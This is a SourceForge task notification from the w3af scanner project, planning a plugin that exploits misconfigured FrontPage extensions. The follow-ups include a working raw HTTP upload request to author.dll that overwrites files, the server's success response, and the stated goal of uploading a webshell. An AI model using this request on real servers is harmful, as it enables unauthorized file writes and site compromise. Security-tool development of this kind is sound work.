[W3af-svn-notify] [Task #145813] frontpage extensions
Status: Beta
Brought to you by:
andresriancho
Menu
▾
▴
[W3af-svn-notify] [Task #145813] frontpage extensions
|
From: SourceForge.net <no...@so...> - 2008-02-24 19:43:14
|
Task #145813 has been updated. Project: w3af Subproject: Plugin TODO v1.00 Summary: frontpage extensions Complete: 50% Status: Open Authority : andresriancho Assigned to: nobody Description: Create a plugin that exploits misconfigured frontpage extensions: Upload a file: POST /_vti_bin/_vti_aut/author.dll - 200 Test if it was created: GET /i.htm - 200 Follow-Ups: ------------------------------------------------------- Date: 2008-02-24 16:43 By: andresriancho Comment: Asked for help on the users mailing list, awaiting response. ------------------------------------------------------- Date: 2008-01-30 16:41 By: andresriancho Comment: Coded the audit plugin, now I need an attack plugin that can exploit this vuln by uploading a webshell. ------------------------------------------------------- Date: 2008-01-30 15:42 By: andresriancho Comment: REQUEST ======= POST http://XXXX/_vti_bin/_vti_aut/author.dll HTTP/1.0 Host: XXXX User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;) Pragma: no-cache Content-Type: application/x-www-form-urlencoded method=put document:4.0.2.4715&service_name=&document=[document_name=index-3.htm;meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false RESPONSE ======== HTTP/1.0 200 OK Date: Wed, 30 Jan 2008 18:37:11 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET X-FrontPage-User-Name: IUSR_ECUIO012EP12 <html><head><title>vermeer RPC packet</title></head> <body> <p>method=put document:4.0.2.4715 <p>message=successfully put document 'index-3.htm' as 'c:\inetpub\wwwroot\index-3.htm' <p>document= <ul> <li>document_name=index-3.htm <li>meta_info= <ul> <li>vti_author <li>SR|IUSR_ECUIO012EP12 <li>vti_modifiedby <li>SR|IUSR_ECUIO012EP12 <li>vti_timecreated <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_timelastmodified <li>TR|30 Jan 2008 18:37:12 -0000 <li>vti_filesize <li>IR|0 <li>vti_backlinkinfo <li>VX| <li>vti_timelastwritten <li>TX|30 Jan 2008 18:37:12 -0000 </ul> </ul> </body> </html> ------------------------------------------------------- Date: 2008-01-30 15:24 By: andresriancho Comment: http://msdn2.microsoft.com/en-us/library/ms479623.aspx ------------------------------------------------------- Date: 2008-01-30 15:18 By: andresriancho Comment: http://www.packetstormsecurity.org/9910-exploits/webfolders.txt ------------------------------------------------------- Date: 2008-01-30 14:59 By: andresriancho Comment: The content posted to author.dll method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dindex.htm%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false ------------------------------------------------------- For more info, visit: http://sourceforge.net/pm/task.php?func=detailtask&project_task_id=145813&group_id=170274&group_project_id=50603 |
